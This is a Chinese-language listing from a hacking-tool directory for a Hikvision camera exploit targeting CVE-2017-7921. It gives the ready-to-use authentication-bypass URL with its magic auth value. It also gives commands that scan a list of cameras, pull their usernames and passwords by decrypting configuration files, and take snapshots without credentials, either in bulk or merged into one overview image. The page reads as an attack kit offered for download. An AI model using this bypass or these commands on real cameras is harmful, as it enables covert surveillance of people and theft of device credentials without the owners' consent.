Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/mverschu/cve-2017-7921
侦察物联网安全密码攻击漏洞分析漏洞利用Web应用程序漏洞利用信息收集身份验证
GitHubmverschu/cve-2017-7921

CVE-2017-7921

HikVision Auth Bypass CVE,工具能够提取凭据,并基于 magic cookie 或提供的凭据拍摄快照。

查看仓库
6个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Hikvision 摄像头列表与快照工具

独立工具,用于从文件列出 Hikvision 摄像头,并使用有效凭据(HTTP Basic 或 Digest 认证)或 CVE 认证绕过从每个摄像头拍摄快照。旨在另一台主机上运行以进行测试。

特性

  • 列出摄像头 – 从文本文件(每行一个 host 或 host:port)中读取摄像头。
  • 检查(CVE) – 测试每个摄像头是否存在魔法认证绕过 CVE(无需凭据);可选 --save-snapshot 保存易受攻击设备的快照。
  • 凭据 – 通过 CVE(魔法认证 + 配置解密)提取每个摄像头的用户名/密码。需要 OpenSSL。
  • 认证检查 – 验证每个摄像头是否接受用户名/密码(不保存快照)。
  • 全部快照 – 从每个摄像头抓取一张图片(有效凭据,或使用 --exploit 通过 CVE 绕过且无需凭据)。
  • 并发请求(可配置工作进程数)。
  • 可选 HTTP Digest 认证;可选 --merge 构建一张总览图。依赖项:requests、Pillow(用于 --merge)。

要求

  • Python 3.8+
  • requests

安装

root@kitploit:~
pip install -r requirements.txt

摄像头列表文件

创建一个文本文件,每行一个摄像头。以 # 开头的行将被忽略。

root@kitploit:~
# 示例 cameras.txt
192.168.1.100
192.168.1.101:80
nvr.local:8080

用法

列出摄像头

打印从文件中读取的摄像头(无需凭据)。

root@kitploit:~
python hikvision_snapshots.py cameras.txt list

可选的可达性检查(向每个主机发送 HTTP GET 请求):

root@kitploit:~
python hikvision_snapshots.py cameras.txt list -v

检查(CVE)

测试每个摄像头是否存在 Hikvision 快照认证绕过 CVE。无需凭据。

root@kitploit:~
python hikvision_snapshots.py cameras.txt check

仅保存易受攻击摄像头的快照:

root@kitploit:~
python hikvision_snapshots.py cameras.txt check --save-snapshot -o ./vuln_snapshots

选项:--timeout、--workers、-o(用于 --save-snapshot)。

凭据(提取)

通过 CVE 从每个摄像头提取凭据(魔法认证获取用户列表和配置文件,然后解密配置)。主机上需要 OpenSSL。运行无需凭据。

root@kitploit:~
python hikvision_snapshots.py cameras.txt credentials

选项:--timeout、--workers。

认证检查

验证你的凭据在每个摄像头上是否有效(使用相同的快照端点;不保存图片)。

root@kitploit:~
python hikvision_snapshots.py cameras.txt auth-check -u admin -p YourPassword

选项:--timeout、--workers、--digest(与快照相同)。

全部摄像头快照

为每个摄像头拍摄一张快照并保存为 JPEG。使用有效凭据或 --exploit(CVE 认证绕过,无需凭据)。

root@kitploit:~
# 使用凭据
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword

# 使用 CVE 漏洞(无需凭据)
python hikvision_snapshots.py cameras.txt snapshot --exploit
  • 快照默认保存在 snapshots/ 目录下(使用 -o 更改)。
  • 文件名派生自 host 或 host_port(例如 192_168_1_100.jpg、nvr_local_8080.jpg)。

选项:

使用 --merge 时,在保存每张快照后,工具会在输出目录中构建一张网格图(overview.jpg),每个摄像头一个单元格并带有标签。需要 Pillow(pip install Pillow)。

自定义输出并使用 Digest 认证的示例:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p secret -o ./images --digest --timeout 20

合并总览图的示例:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword --merge
# 或使用漏洞(无需凭据):
python hikvision_snapshots.py cameras.txt snapshot --exploit --merge -o ./out

端点

经过认证的快照(使用凭据):脚本按顺序尝试 – /ISAPI/Streaming/channels/1/picture、/ISAPI/Streaming/channels/101/picture、/onvif-http/snapshot。

CVE(检查 / --exploit): /onvif-http/snapshot?auth=YWRtaW46MTEK(魔法认证绕过,无需凭据)。

在其他主机上运行

  1. 将 hikvision_snapshots.py、requirements.txt 和摄像头列表文件复制到目标主机。
  2. 安装:pip install -r requirements.txt
  3. 运行 list 验证文件;使用 check 进行 CVE 检查、auth-check 进行凭据验证,或使用 snapshot(带 -u/-p 或 --exploit)。

确保目标主机能够网络访问所有摄像头的 IP 和端口。

下载工具
选项描述默认值
-u, --username摄像头用户名需要(除非使用 --exploit)
-p, --password摄像头密码需要(除非使用 --exploit)
--exploit使用 CVE 魔法认证绕过(无需凭据)关闭
-o, --output-dir快照图片保存目录snapshots
--timeoutHTTP 超时(秒)15
--workers并发快照请求数10
--digest使用 HTTP Digest 认证而非 Basic关闭
--merge将所有快照合并为一张总览图关闭
--merge-columns合并的网格列数(默认:自动)自动